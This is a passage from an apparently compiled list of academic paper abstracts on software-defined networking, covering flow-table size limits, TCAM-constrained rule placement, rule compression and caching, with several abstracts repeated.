policies, and then implements them in the forwarding tables of network switches. However, fast SDN tables often cannot scale beyond a few hundred entries. This is because they typically include wildcards, and therefore are implemented using either expensive and power-hungry TCAMs, or complex and slow data structures. This paper presents the Palette distribution framework for decomposing large SDN tables into small ones and then distributing them across the network, while preserving the overall SDN policy semantics. Palette helps balance the sizes of the tables across the network, as well as reduce the total number of entries by sharing resources among different connections. It copes with two NP-hard optimization problems: Decomposing a large SDN table into equivalent subtables, and distributing the subtables such that each connection traverses each type of subtable at least once. To implement the Palette distribution framework, we introduce graph-theoretical formulations and algorithms, and show that they achieve close-to-optimal results in practice. --- paper_title: SwitchReduce: Reducing switch state and controller involvement in OpenFlow networks paper_content: OpenFlow is a popular network architecture where a logically centralized controller (the control plane) is physically decoupled from all forwarding switches (the data plane). Through this controller, the OpenFlow framework enables flow level granularity in switches thereby providing monitoring and control over each individual flow. Among other things, this architecture comes at the cost of placing significant stress on switch state size and overburdening the controller in various traffic engineering scenarios such as dynamic re-routing of flows. Storing a flow match rule and flow counter at every switch along a flow's path results in many thousands of entries per switch. Dynamic rerouting of a flow, either in an attempt to utilize less congested paths, or as a consequence of virtual machine migration, results in controller intervention at every switch along the old and new paths. In the absence of careful orchestration of flow storage and controller involvement, OpenFlow will be unable to scale to anticipated production data center sizes. In this context, we present SwitchReduce - a system to reduce switch state and controller involvement in OpenFlow networks. SwitchReduce is founded on the observation that the number of flow match rules at any switch should be no more than the set of unique processing actions it has to take on incoming flows. Additionally, the flow counters for every unique flow may be maintained at only one switch in the network. We have implemented SwitchReduce as a NOX controller application. Simulation results with real data center traffic traces reveal that SwitchReduce can reduce flow entries by up to approximately 49% on first hop switches, and up to 99.9% on interior switches, while reducing flow counters by 75% on average. --- paper_title: Optimizing the "one big switch" abstraction in software-defined networks paper_content: Software Defined Networks (SDNs) support diverse network policies by offering direct, network-wide control over how switches handle traffic. Unfortunately, many controller platforms force applications to grapple simultaneously with end-to-end connectivity constraints, routing policy, switch memory limits, and the hop-by-hop interactions between forwarding rules. We believe solutions to this complex problem should be factored in to three distinct parts: (1) high-level SDN applications should define their end-point connectivity policy on top of a "one big switch" abstraction; (2) a mid-level SDN infrastructure layer should decide on the hop-by-hop routing policy; and (3) a compiler should synthesize an effective set of forwarding rules that obey the user-defined policies and adhere to the resource constraints of the underlying hardware. In this paper, we define and implement our proposed architecture, present efficient rule-placement algorithms that distribute forwarding policies across general SDN networks while managing rule-space constraints, and show how to support dynamic, incremental update of policies. We evaluate the effectiveness of our algorithms analytically by providing complexity bounds on their running time and rule space, as well as empirically, using both synthetic benchmarks, and real-world firewall and routing policies. --- paper_title: Too Many SDN Rules? Compress Them with MINNIE paper_content: Software Defined Networking (SDN) is gaining momentum with the support of major manufacturers. While it brings flexibility in the management of flows within the data center fabric, this flexibility comes at the cost of smaller routing table capacities. In this paper, we investigate compression techniques to reduce the forwarding information base (FIB) of SDN switches. We validate our algorithm, called MINNIE, on a real testbed able to emulate a 20 switches fat tree architecture. We demonstrate that even with a small number of clients, the limit in terms of number of rules is reached if no compression is performed, increasing the delay of all new incoming flows. MINNIE, on the other hand, reduces drastically the number of rules that need to be stored with a limited impact on the packet loss rate. We also evaluate the actual switching and reconfiguration times and the delay introduced by the communications with the controller. --- paper_title: An Adaptable Rule Placement for Software-Defined Networks paper_content: There is a strong trend in networking to move towards Software-Defined Networks (SDN). SDNs enable easier network configuration through a separation between a centralized controller and a distributed data plane comprising a network of switches. The controller implements network policies through installing rules on switches. Recently the "Big Switch" abstraction [1] was proposed as a specification mechanism for high-level network behavior, i.e., the network policies. The network operating system or compiler can use his specification for placing rules on individual switches. However, this is constrained by the limited capacity of the Ternary Content Addressable Memories (TCAMs) used for rules in each switch. We propose an Integer Linear Programming (ILP) based solution for placing rules on switches for a given firewall policy while optimizing for the total number of rules and meeting the switch capacity constraints. Experimental results demonstrate that our approach is scalable to practical sized networks. --- paper_title: Wildcard Compression of Inter-Domain Routing Tables for OpenFlow-Based Software-Defined Networking paper_content: In this paper we consider carrier networks using only OpenFlow switches instead of IP routers. Accommodating the full forwarding information base (FIB) of IP routers in the switches is difficult because the BGP routing tables in the default-free zone currently contain about 500,000 entries and switches have only little capacity in their fast and expensive TCAM memory. The objective of this paper is the compression of the FIB in acceptable time to minimize the TCAM requirements of switches. The benchmark is simple prefix aggregation as it is common in IP networks where longest-prefix matching is applied. In contrast, OpenFlow-based switches can match general wildcard expressions with priorities. Starting from a minimum-size prefix-based FIB, we further compress that FIB by allowing general wildcard expressions utilizing the Espresso heuristic that is commonly used for logic minimization. As the computation time of Espresso is challenging for large inputs, we provide means to trade computation time against compression efficiency. Our results show that today's FIB sizes can be reduced by 17% saving up to 40,000 entries and the compression time can be limited to 1 -- 2s sacrificing only 1% -- 2% compression ratio. --- paper_title: OFFICER: A general optimization framework for OpenFlow rule allocation and endpoint policy enforcement paper_content: The Software-Defined Networking approach permits to realize new policies. In OpenFlow in particular, a controller decides on behalf of the switches which forwarding rules must be installed and where. However with this flexibility comes the challenge of the computation of a rule allocation matrix meeting both high-level policies and the network constraints such as memory or link capacity limitations. Nevertheless, in many situations (e.g., data-center networks), the exact path followed by packets does not severely impact performances as long as packets are delivered according to the endpoint policy. It is thus possible to deviate part of the traffic to alternative paths so to better use network resources without violating the endpoint policy. In this paper, we propose a linear optimization model of the rule allocation problem in resource constrained OpenFlow networks with relaxing routing policy. We show that the general problem is NP-hard and propose a polynomial time heuristic, called OFFICER, which aims to maximize the amount of carried traffic in under-provisioned networks. Our numerical evaluation on four different topologies shows that exploiting various paths allows to increase the amount of traffic supported by the network without significantly increasing the path length. --- paper_title: Fast incremental flow table aggregation in SDN paper_content: In OpenFlow-based SDN, flow tables are TCAM-hungry and commodity switches suffer from limited concrete flow table size. One method for coping with the limitations is to use aggregation schemes to reduce the number of flow entries required to represent the same forwarding semantics. Unfortunately, the aggregation retards table updates and lengthens the updating time. During which, the data plane is inconsistent with the control plane, forwarding errors such as Reachability Failures, Forwarding Loops, Traffic Isolation and Leakage are prone to occur. Since network updates take place frequently in practice, the aggregation scheme must be efficient enough. In this paper we propose offline FFTA (Fast Flow Table Aggregation) and its online improver iFFTA to shrink the flow table size and to provide practical fast updates. iFFTA is the first online non-prefix aggregation scheme. Extensive experiments demonstrate: (1) FFTA is about 200× faster than the previously published best non-prefix aggregation scheme without loss of compression ratio on offline aggregation; and (2) iFFTA achieves about 3× faster than FFTA on online update incorporations with a loss of an acceptable compression ratio per update. Thus the user could make a combination use of FFTA and iFFTA for table aggregations: call iFFTA usually and recall the efficient FFTA once the switch is running out of concrete flow table space. --- paper_title: Source flow: handling millions of flows on flow-based nodes paper_content: Flow-based networks such as OpenFlow-based networks have difficulty handling a large number of flows in a node due to the capacity limitation of search engine devices such as ternary content-addressable memory (TCAM). One typical solution of this problem would be to use MPLS-like tunneling, but this approach spoils the advantage of flow-by-flow path selection for load-balancing or QoS. We demonstrate a method named "Source Flow" that allows us to handle a huge amount of flows without changing the granularity of flows. By using our method, expensive and power consuming search engine devices can be removed from the core nodes, and the network can grow pretty scalable. In our demo, we construct a small network that consists of small number of OpenFlow switches, a single OpenFlow controller, and end-hosts. The hosts generate more than one million flows simultaneously and the flows are controlled on a per-flow-basis. All active flows are monitored and visualized on a user interface and the user interface allows audiences to confirm if our method is feasible and deployable. --- paper_title: Network traffic characteristics of data centers in the wild paper_content: Although there is tremendous interest in designing improved networks for data centers, very little is known about the network-level traffic characteristics of data centers today. In this paper, we conduct an empirical study of the network traffic in 10 data centers belonging to three different categories, including university, enterprise campus, and cloud data centers. Our definition of cloud data centers includes not only data centers employed by large online service providers offering Internet-facing applications but also data centers used to host data-intensive (MapReduce style) applications). We collect and analyze SNMP statistics, topology and packet-level traces. We examine the range of applications deployed in these data centers and their placement, the flow-level and packet-level transmission properties of these applications, and their impact on network and link utilizations, congestion and packet drops. We describe the implications of the observed traffic patterns for data center internal traffic engineering as well as for recently proposed architectures for data center networks. --- paper_title: Dynamic scheduling of network updates paper_content: We present Dionysus, a system for fast, consistent network updates in software-defined networks. Dionysus encodes as a graph the consistency-related dependencies among updates at individual switches, and it then dynamically schedules these updates based on runtime differences in the update speeds of different switches. This dynamic scheduling is the key to its speed; prior update methods are slow because they pre-determine a schedule, which does not adapt to runtime conditions. Testbed experiments and data-driven simulations show that Dionysus improves the median update speed by 53--88% in both wide area and data center networks compared to prior methods. --- paper_title: DomainFlow: practical flow management method using multiple flow tables in commodity switches paper_content: A scalable network with high bisection bandwidth and high availability requires efficient use of the multiple paths between pairs of end hosts. OpenFlow is an innovative technology and enables fine-grained, flow level control of Ethernet switching. However, the flow table structure defined by OpenFlow is not hardware friendly and the scalability is limited by the switch device. OpenFlow is also not sufficient for fast multipath failover. To overcome these limitations, we propose DomainFlow in which the network is split into sections and exact matches are used where possible to enable practical flow management using OpenFlow for commodity switches. We applied a prototype of DomainFlow to multipath flow management in the Virtual eXtensible LAN (VXLAN) overlay network environment. The total number of flow entries was reduced to 1/128 using currently available commodity switches, which was not possible before. --- paper_title: SwitchReduce: Reducing switch state and controller involvement in OpenFlow networks paper_content: OpenFlow is a popular network architecture where a logically centralized controller (the control plane) is physically decoupled from all forwarding switches (the data plane). Through this controller, the OpenFlow framework enables flow level granularity in switches thereby providing monitoring and control over each individual flow. Among other things, this architecture comes at the cost of placing significant stress on switch state size and overburdening the controller in various traffic engineering scenarios such as dynamic re-routing of flows. Storing a flow match rule and flow counter at every switch along a flow's path results in many thousands of entries per switch. Dynamic rerouting of a flow, either in an attempt to utilize less congested paths, or as a consequence of virtual machine migration, results in controller intervention at every switch along the old and new paths. In the absence of careful orchestration of flow storage and controller involvement, OpenFlow will be unable to scale to anticipated production data center sizes. In this context, we present SwitchReduce - a system to reduce switch state and controller involvement in OpenFlow networks. SwitchReduce is founded on the observation that the number of flow match rules at any switch should be no more than the set of unique processing actions it has to take on incoming flows. Additionally, the flow counters for every unique flow may be maintained at only one switch in the network. We have implemented SwitchReduce as a NOX controller application. Simulation results with real data center traffic traces reveal that SwitchReduce can reduce flow entries by up to approximately 49% on first hop switches, and up to 99.9% on interior switches, while reducing flow counters by 75% on average. --- paper_title: DevoFlow: scaling flow management for high-performance networks paper_content: OpenFlow is a great concept, but its original design imposes excessive overheads. It can simplify network and traffic management in enterprise and data center environments, because it enables flow-level control over Ethernet switching and provides global visibility of the flows in the network. However, such fine-grained control and visibility comes with costs: the switch-implementation costs of involving the switch's control-plane too often and the distributed-system costs of involving the OpenFlow controller too frequently, both on flow setups and especially for statistics-gathering. ::: In this paper, we analyze these overheads, and show that OpenFlow's current design cannot meet the needs of high-performance networks. We design and evaluate DevoFlow, a modification of the OpenFlow model which gently breaks the coupling between control and global visibility, in a way that maintains a useful amount of visibility without imposing unnecessary costs. We evaluate DevoFlow through simulations, and find that it can load-balance data center traffic as well as fine-grained solutions, without as much overhead: DevoFlow uses 10--53 times fewer flow table entries at an average switch, and uses 10--42 times fewer control messages. --- paper_title: Shadow MACs: scalable label-switching for commodity ethernet paper_content: While SDN promises fine-grained, dynamic control of the network, in practice limited switch TCAM rule space restricts most forwarding to be coarse-grained. As an alternative, we demonstrate that using destination MAC addresses as opaque forwarding labels allows an SDN controller to leverage large MAC (L2) forwarding tables to manage a plethora of fine-grained paths. In this shadow MAC model, the SDN controller can install MAC rewrite rules at the network edge to guide traffic on to intelligently selected paths to balance traffic, avoid failed links, or route flows through middleboxes. Further, by decoupling the network edge from the core, we address many other problems with SDN, including consistent network updates, fast rerouting, and multipathing with end-to-end control. --- paper_title: OFFICER: A general optimization framework for OpenFlow rule allocation and endpoint policy enforcement paper_content: The Software-Defined Networking approach permits to realize new policies. In OpenFlow in particular, a controller decides on behalf of the switches which forwarding rules must be installed and where. However with this flexibility comes the challenge of the computation of a rule allocation matrix meeting both high-level policies and the network constraints such as memory or link capacity limitations. Nevertheless, in many situations (e.g., data-center networks), the exact path followed by packets does not severely impact performances as long as packets are delivered according to the endpoint policy. It is thus possible to deviate part of the traffic to alternative paths so to better use network resources without violating the endpoint policy. In this paper, we propose a linear optimization model of the rule allocation problem in resource constrained OpenFlow networks with relaxing routing policy. We show that the general problem is NP-hard and propose a polynomial time heuristic, called OFFICER, which aims to maximize the amount of carried traffic in under-provisioned networks. Our numerical evaluation on four different topologies shows that exploiting various paths allows to increase the amount of traffic supported by the network without significantly increasing the path length. --- paper_title: Optimizing rule placement in software-defined networks for energy-aware routing paper_content: Software-defined Networks (SDN), in particular OpenFlow, is a new networking paradigm enabling innovation through network programmability. Over past few years, many applications have been built using SDN such as server load balancing, virtual-machine migration, traffic engineering and access control. In this paper, we focus on using SDN for energy-aware routing (EAR). Since traffic load has a small influence on power consumption of routers, EAR allows to put unused links into sleep mode to save energy. SDN can collect traffic matrix and then computes routing solutions satisfying QoS while being minimal in energy consumption. However, prior works on EAR have assumed that the table of OpenFlow switch can hold an infinite number of rules. In practice, this assumption does not hold since the flow table is implemented with Ternary Content Addressable Memory (TCAM) which is expensive and power-hungry. In this paper, we propose an optimization method to minimize energy consumption for a backbone network while respecting capacity constraints on links and rule space constraints on routers. In details, we present an exact formulation using Integer Linear Program (ILP) and introduce efficient greedy heuristic algorithm. Based on simulations, we show that using this smart rule space allocation, it is possible to save almost as much power consumption as the classical EAR approach. --- paper_title: Palette: Distributing tables in software-defined networks paper_content: In software-defined networks (SDNs), the network controller first formulates abstract network-wide policies, and then implements them in the forwarding tables of network switches. However, fast SDN tables often cannot scale beyond a few hundred entries. This is because they typically include wildcards, and therefore are implemented using either expensive and power-hungry TCAMs, or complex and slow data structures. This paper presents the Palette distribution framework for decomposing large SDN tables into small ones and then distributing them across the network, while preserving the overall SDN policy semantics. Palette helps balance the sizes of the tables across the network, as well as reduce the total number of entries by sharing resources among different connections. It copes with two NP-hard optimization problems: Decomposing a large SDN table into equivalent subtables, and distributing the subtables such that each connection traverses each type of subtable at least once. To implement the Palette distribution framework, we introduce graph-theoretical formulations and algorithms, and show that they achieve close-to-optimal results in practice. --- paper_title: Optimizing the "one big switch" abstraction in software-defined networks paper_content: Software Defined Networks (SDNs) support diverse network policies by offering direct, network-wide control over how switches handle traffic. Unfortunately, many controller platforms force applications to grapple simultaneously with end-to-end connectivity constraints, routing policy, switch memory limits, and the hop-by-hop interactions between forwarding rules. We believe solutions to this complex problem should be factored in to three distinct parts: (1) high-level SDN applications should define their end-point connectivity policy on top of a "one big switch" abstraction; (2) a mid-level SDN infrastructure layer should decide on the hop-by-hop routing policy; and (3) a compiler should synthesize an effective set of forwarding rules that obey the user-defined policies and adhere to the resource constraints of the underlying hardware. In this paper, we define and implement our proposed architecture, present efficient rule-placement algorithms that distribute forwarding policies across general SDN networks while managing rule-space constraints, and show how to support dynamic, incremental update of policies. We evaluate the effectiveness of our algorithms analytically by providing complexity bounds on their running time and rule space, as well as empirically, using both synthetic benchmarks, and real-world firewall and routing policies. --- paper_title: An Adaptable Rule Placement for Software-Defined Networks paper_content: There is a strong trend in networking to move towards Software-Defined Networks (SDN). SDNs enable easier network configuration through a separation between a centralized controller and a distributed data plane comprising a network of switches. The controller implements network policies through installing rules on switches. Recently the "Big Switch" abstraction [1] was proposed as a specification mechanism for high-level network behavior, i.e., the network policies. The network operating system or compiler can use his specification for placing rules on individual switches. However, this is constrained by the limited capacity of the Ternary Content Addressable Memories (TCAMs) used for rules in each switch. We propose an Integer Linear Programming (ILP) based solution for placing rules on switches for a given firewall policy while optimizing for the total number of rules and meeting the switch capacity constraints. Experimental results demonstrate that our approach is scalable to practical sized networks. --- paper_title: OFFICER: A general optimization framework for OpenFlow rule allocation and endpoint policy enforcement paper_content: The Software-Defined Networking approach permits to realize new policies. In OpenFlow in particular, a controller decides on behalf of the switches which forwarding rules must be installed and where. However with this flexibility comes the challenge of the computation of a rule allocation matrix meeting both high-level policies and the network constraints such as memory or link capacity limitations. Nevertheless, in many situations (e.g., data-center networks), the exact path followed by packets does not severely impact performances as long as packets are delivered according to the endpoint policy. It is thus possible to deviate part of the traffic to alternative paths so to better use network resources without violating the endpoint policy. In this paper, we propose a linear optimization model of the rule allocation problem in resource constrained OpenFlow networks with relaxing routing policy. We show that the general problem is NP-hard and propose a polynomial time heuristic, called OFFICER, which aims to maximize the amount of carried traffic in under-provisioned networks. Our numerical evaluation on four different topologies shows that exploiting various paths allows to increase the amount of traffic supported by the network without significantly increasing the path length. --- paper_title: The joint optimization of rules allocation and traffic engineering in Software Defined Network paper_content: Software-Defined Network (SDN) is a promising network paradigm that separates the control plane and data plane in the network. It has shown great advantages in simplifying network management such that new functions can be easily supported without physical access to the network switches. However, Ternary Content Addressable Memory (TCAM), as a critical hardware storing rules for high-speed packet processing in SDN-enabled devices, can be supplied to each device with very limited quantity because it is expensive and energy-consuming. To efficiently use TCAM resources, we propose a rule multiplexing scheme, in which the same set of rules deployed on each node apply to the whole flow of a session going through but towards different paths. Based on this scheme, we study the rule placement problem with the objective of minimizing rule space occupation for multiple unicast sessions under QoS constraints.We formulate the optimization problem jointly considering routing engineering and rule placement under both existing and our rule multiplexing schemes. Finally, extensive simulations are conducted to show that our proposals significantly outperform existing solutions. --- paper_title: Infinite CacheFlow in software-defined networks paper_content: Software-Defined Networking (SDN) enables fine-grained policies for firewalls, load balancers, routers, traffic monitoring, and other functionality. While Ternary Content Addressable Memory (TCAM) enables OpenFlow switches to process packets at high speed based on multiple header fields, today's commodity switches support just thousands to tens of thousands of rules. To realize the potential of SDN on this hardware, we need efficient ways to support the abstraction of a switch with arbitrarily large rule tables. To do so, we define a hardware-software hybrid switch design that relies on rule caching to provide large rule tables at low cost. Unlike traditional caching solutions, we neither cache individual rules (to respect rule dependencies) nor compress rules (to preserve the per-rule traffic counts). Instead we ``splice'' long dependency chains to cache smaller groups of rules while preserving the semantics of the network policy. Our design satisfies four core criteria: (1) elasticity (combining the best of hardware and software switches), (2) transparency (faithfully supporting native OpenFlow semantics, including traffic counters), (3) fine-grained rule caching (placing popular rules in the TCAM, despite dependencies on less-popular rules), and (4) adaptability (to enable incremental changes to the rule caching as the policy changes). --- paper_title: Rule Optimization for Real-Time Query Service in Software-Defined Internet of Vehicles paper_content: Internet of Vehicles (IoV) has recently gained considerable attentions from both industry and research communities since the development of communication technology and smart city. However, a proprietary and closed way of operating hardwares in network equipments slows down the progress of new services deployment and extension in IoV. Moreover, the tightly coupled control and data planes in traditional networks significantly increase the complexity and cost of network management. By proposing a novel architecture, called Software-Defined Internet of Vehicles (SDIV), we adopt the software-defined network (SDN) architecture to address these problems by leveraging its separation of the control plane from the data plane and a uniform way to configure heterogeneous switches. However, the characteristics of IoV introduce the very challenges in rule installation due to the limited size of Flow Tables at OpenFlow-enabled switches which are the main component of SDN. It is necessary to build compact Flow Tables for the scalability of IoV. Accordingly, we develop a rule optimization approach for real-time query service in SDIV. Specifically, we separate wired data plane from wireless data plane and use multicast address in wireless data plane. Furthermore, we introduce a destination-driven model in wired data plane for reducing the number of rules at switches. Experiments show that our rule optimization strategy reduces the number of rules while keeping the performance of data transmission. --- paper_title: Optimizing rule placement in software-defined networks for energy-aware routing paper_content: Software-defined Networks (SDN), in particular OpenFlow, is a new networking paradigm enabling innovation through network programmability. Over past few years, many applications have been built using SDN such as server load balancing, virtual-machine migration, traffic engineering and access control. In this paper, we focus on using SDN for energy-aware routing (EAR). Since traffic load has a small influence on power consumption of routers, EAR allows to put unused links into sleep mode to save energy. SDN can collect traffic matrix and then computes routing solutions satisfying QoS while being minimal in energy consumption. However, prior works on EAR have assumed that the table of OpenFlow switch can hold an infinite number of rules. In practice, this assumption does not hold since the flow table is implemented with Ternary Content Addressable Memory (TCAM) which is expensive and power-hungry. In this paper, we propose an optimization method to minimize energy consumption for a backbone network while respecting capacity constraints on links and rule space constraints on routers. In details, we present an exact formulation using Integer Linear Program (ILP) and introduce efficient greedy heuristic algorithm. Based on simulations, we show that using this smart rule space allocation, it is possible to save almost as much power consumption as the classical EAR approach. --- paper_title: Palette: Distributing tables in software-defined networks paper_content: In software-defined networks (SDNs), the network controller first formulates abstract network-wide policies, and then implements them in the forwarding tables of network switches. However, fast SDN tables often cannot scale beyond a few hundred entries. This is because they typically include wildcards, and therefore are implemented using either expensive and power-hungry TCAMs, or complex and slow data structures. This paper presents the Palette distribution framework for decomposing large SDN tables into small ones and then distributing them across the network, while preserving the overall SDN policy semantics. Palette helps balance the sizes of the tables across the network, as well as reduce the total number of entries by sharing resources among different connections. It copes with two NP-hard optimization problems: Decomposing a large SDN table into equivalent subtables, and distributing the subtables such that each connection traverses each type of subtable at least once. To implement the Palette distribution framework, we introduce graph-theoretical formulations and algorithms, and show that they achieve close-to-optimal results in practice. --- paper_title: DomainFlow: practical flow management method using multiple flow tables in commodity switches paper_content: A scalable network with high bisection bandwidth and high availability requires efficient use of the multiple paths between pairs of end hosts. OpenFlow is an innovative technology and enables fine-grained, flow level control of Ethernet switching. However, the flow table structure defined by OpenFlow is not hardware friendly and the scalability is limited by the switch device. OpenFlow is also not sufficient for fast multipath failover. To overcome these limitations, we propose DomainFlow in which the network is split into sections and exact matches are used where possible to enable practical flow management using OpenFlow for commodity switches. We applied a prototype of DomainFlow to multipath flow management in the Virtual eXtensible LAN (VXLAN) overlay network environment. The total number of flow entries was reduced to 1/128 using currently available commodity switches, which was not possible before. --- paper_title: Heterogeneous Flow Table Distribution in Software-defined Networks paper_content: Recently, Software-defined Network (SDN) has become an important and popular technology which provides for the flexibility of developing new protocols and the policies of real networks. The controller in SDN translates network policies into rules which are installed in the flow tables (Flow tables are usually stored in ternary content addressable memory (TCAM)) of switches in the networks. Hence, TCAM usually has some critical disadvantages (e.g., high costs, power consumption and high heat generation). Flow tables cannot scale beyond a few hundred entries. Therefore, switches may need to cache rules reactively (i.e., installing rules on demand). However, when cache misses happen, switches will send the packet-in message to the controller and reactively cache the rules, which causes packet delay and large buffers. In this thesis, we propose a rule partition and allocation algorithm that distributes rules across network switches to improve the performance. Our algorithm not only is applicable to small TCAM switch scenario, but also guarantees semantically-invariant (i.e., the global action of the network is unchanged). We implement our algorithm into the real world SDN scenario and the experiment result shows that our algorithm have obviously reduced TCAM usage. --- paper_title: SwitchReduce: Reducing switch state and controller involvement in OpenFlow networks paper_content: OpenFlow is a popular network architecture where a logically centralized controller (the control plane) is physically decoupled from all forwarding switches (the data plane). Through this controller, the OpenFlow framework enables flow level granularity in switches thereby providing monitoring and control over each individual flow. Among other things, this architecture comes at the cost of placing significant stress on switch state size and overburdening the controller in various traffic engineering scenarios such as dynamic re-routing of flows. Storing a flow match rule and flow counter at every switch along a flow's path results in many thousands of entries per switch. Dynamic rerouting of a flow, either in an attempt to utilize less congested paths, or as a consequence of virtual machine migration, results in controller intervention at every switch along the old and new paths. In the absence of careful orchestration of flow storage and controller involvement, OpenFlow will be unable to scale to anticipated production data center sizes. In this context, we present SwitchReduce - a system to reduce switch state and controller involvement in OpenFlow networks. SwitchReduce is founded on the observation that the number of flow match rules at any switch should be no more than the set of unique processing actions it has to take on incoming flows. Additionally, the flow counters for every unique flow may be maintained at only one switch in the network. We have implemented SwitchReduce as a NOX controller application. Simulation results with real data center traffic traces reveal that SwitchReduce can reduce flow entries by up to approximately 49% on first hop switches, and up to 99.9% on interior switches, while reducing flow counters by 75% on average. --- paper_title: vCRIB: virtualized rule management in the cloud paper_content: Cloud operators increasingly need many fine-grained rules to better control individual network flows for various management tasks. While previous approaches have advocated placing rules either on hypervisors or switches, we argue that future data centers would benefit from leveraging rule processing capabilities at both for better scalability and performance. In this paper, we propose vCRIB, a virtualized Cloud Rule Information Base that allows operators to freely define different management policies without the need to consider underlying resource constraints. The challenge in our approach is the design of a vCRIB manager that automatically partitions and places rules at both hypervisors and switches to achieve a good trade-off between resource usage and performance. --- paper_title: Rule caching in SDN-enabled mobile access networks paper_content: An SDN enabled mobile access network is a future network with great potential to support scalable and flexible network applications. To support various network applications, the SDN-enabled mobile access network usually uses forwarding rules in SDN devices. With a limited rule space in existing SDN devices, a rule caching mechanism is an efficient way to improve network performance. In this article we propose SRCMN, which is a new caching structure to improve network performance with a limited rule space in the SDN-enabled mobile access network. We design a two-layer rule space in each SDN device, which is managed by the SDN controller. We also design a cache prefetching mechanism with the consideration of user mobility. By conducting extensive simulations, we demonstrate that our proposed structure and mechanism significantly outperform original rule space management under various network settings. --- paper_title: Optimizing the "one big switch" abstraction in software-defined networks paper_content: Software Defined Networks (SDNs) support diverse network policies by offering direct, network-wide control over how switches handle traffic. Unfortunately, many controller platforms force applications to grapple simultaneously with end-to-end connectivity constraints, routing policy, switch memory limits, and the hop-by-hop interactions between forwarding rules. We believe solutions to this complex problem should be factored in to three distinct parts: (1) high-level SDN applications should define their end-point connectivity policy on top of a "one big switch" abstraction; (2) a mid-level SDN infrastructure layer should decide on the hop-by-hop routing policy; and (3) a compiler should synthesize an effective set of forwarding rules that obey the user-defined policies and adhere to the resource constraints of the underlying hardware. In this paper, we define and implement our proposed architecture, present efficient rule-placement algorithms that distribute forwarding policies across general SDN networks while managing rule-space constraints, and show how to support dynamic, incremental update of policies. We evaluate the effectiveness of our algorithms analytically by providing complexity bounds on their running time and rule space, as well as empirically, using both synthetic benchmarks, and real-world firewall and routing policies. --- paper_title: Optimizing rules placement in OpenFlow networks: trading routing for better efficiency paper_content: The idea behind Software Defined Networking (SDN) is to conceive the network as one programmable entity rather than a set of devices to manually configure, and OpenFlow meets this objective. In OpenFlow, a centralized programmable controller installs rules onto switches to implement policies. However, this flexibility comes at the expense of extra overhead as the number of rules might exceed the memory capacity of switches, which raises the question of how to place most profitable rules on board. Solutions proposed so far strictly impose paths to be followed inside the network. We advocate instead that we can trade routing requirements within the network to concentrate on where to forward traffic, not how to do it. As an illustration of the concept, we propose an optimization problem that gets the maximum amount of traffic delivered according to policies and the actual dimensioning of the network. The traffic that cannot be accommodated is forwarded to the controller that has the capacity to process it further. We also demonstrate that our approach permits a better utilization of scarce resources in the network. --- paper_title: An Adaptable Rule Placement for Software-Defined Networks paper_content: There is a strong trend in networking to move towards Software-Defined Networks (SDN). SDNs enable easier network configuration through a separation between a centralized controller and a distributed data plane comprising a network of switches. The controller implements network policies through installing rules on switches. Recently the "Big Switch" abstraction [1] was proposed as a specification mechanism for high-level network behavior, i.e., the network policies. The network operating system or compiler can use his specification for placing rules on individual switches. However, this is constrained by the limited capacity of the Ternary Content Addressable Memories (TCAMs) used for rules in each switch. We propose an Integer Linear Programming (ILP) based solution for placing rules on switches for a given firewall policy while optimizing for the total number of rules and meeting the switch capacity constraints. Experimental results demonstrate that our approach is scalable to practical sized networks. --- paper_title: MoRule: Optimized rule placement for mobile users in SDN-enabled access networks paper_content: With the surging popularity of smartphones and tablets, mobile network traffic has dramatically increased in recent years. Software defined network (SDN) provides a scalable and flexible structure to simplify network traffic management. It has been shown that rule placement plays an important role in the performance of SDN. However, since most existing work considers static network topologies of wired networks, it cannot be directly applied for mobile networks. In this paper, we propose MoRule, an efficient rule management scheme to optimize the rule placement for mobile users. To deal with the challenges of user mobility and rule capacity constraints of switches, we design a heuristic algorithm with low-complexity to minimize the rule space occupation while guaranteeing that the mobile traffic processed by local switches is no less than a threshold. By conducting extensive simulations, we demonstrate that our proposed algorithm significantly outperforms random solutions under various network settings. --- paper_title: Shadow MACs: scalable label-switching for commodity ethernet paper_content: While SDN promises fine-grained, dynamic control of the network, in practice limited switch TCAM rule space restricts most forwarding to be coarse-grained. As an alternative, we demonstrate that using destination MAC addresses as opaque forwarding labels allows an SDN controller to leverage large MAC (L2) forwarding tables to manage a plethora of fine-grained paths. In this shadow MAC model, the SDN controller can install MAC rewrite rules at the network edge to guide traffic on to intelligently selected paths to balance traffic, avoid failed links, or route flows through middleboxes. Further, by decoupling the network edge from the core, we address many other problems with SDN, including consistent network updates, fast rerouting, and multipathing with end-to-end control. --- paper_title: OFFICER: A general optimization framework for OpenFlow rule allocation and endpoint policy enforcement paper_content: The Software-Defined Networking approach permits to realize new policies. In OpenFlow in particular, a controller decides on behalf of the switches which forwarding rules must be installed and where. However with this flexibility comes the challenge of the computation of a rule allocation matrix meeting both high-level policies and the network constraints such as memory or link capacity limitations. Nevertheless, in many situations (e.g., data-center networks), the exact path followed by packets does not severely impact performances as long as packets are delivered according to the endpoint policy. It is thus possible to deviate part of the traffic to alternative paths so to better use network resources without violating the endpoint policy. In this paper, we propose a linear optimization model of the rule allocation problem in resource constrained OpenFlow networks with relaxing routing policy. We show that the general problem is NP-hard and propose a polynomial time heuristic, called OFFICER, which aims to maximize the amount of carried traffic in under-provisioned networks. Our numerical evaluation on four different topologies shows that exploiting various paths allows to increase the amount of traffic supported by the network without significantly increasing the path length. --- paper_title: MicroTE: fine grained traffic engineering for data centers paper_content: The effects of data center traffic characteristics on data center traffic engineering is not well understood. In particular, it is unclear how existing traffic engineering techniques perform under various traffic patterns, namely how do the computed routes differ from the optimal routes. Our study reveals that existing traffic engineering techniques perform 15% to 20% worse than the optimal solution. We find that these techniques suffer mainly due to their inability to utilize global knowledge about flow characteristics and make coordinated decision for scheduling flows. To this end, we have developed MicroTE, a system that adapts to traffic variations by leveraging the short term and partial predictability of the traffic matrix. We implement MicroTE within the OpenFlow framework and with minor modification to the end hosts. In our evaluations, we show that our system performs close to the optimal solution and imposes minimal overhead on the network making it appropriate for current and future data centers. --- paper_title: Infinite CacheFlow in software-defined networks paper_content: Software-Defined Networking (SDN) enables fine-grained policies for firewalls, load balancers, routers, traffic monitoring, and other functionality. While Ternary Content Addressable Memory (TCAM) enables OpenFlow switches to process packets at high speed based on multiple header fields, today's commodity switches support just thousands to tens of thousands of rules. To realize the potential of SDN on this hardware, we need efficient ways to support the abstraction of a switch with arbitrarily large rule tables. To do so, we define a hardware-software hybrid switch design that relies on rule caching to provide large rule tables at low cost. Unlike traditional caching 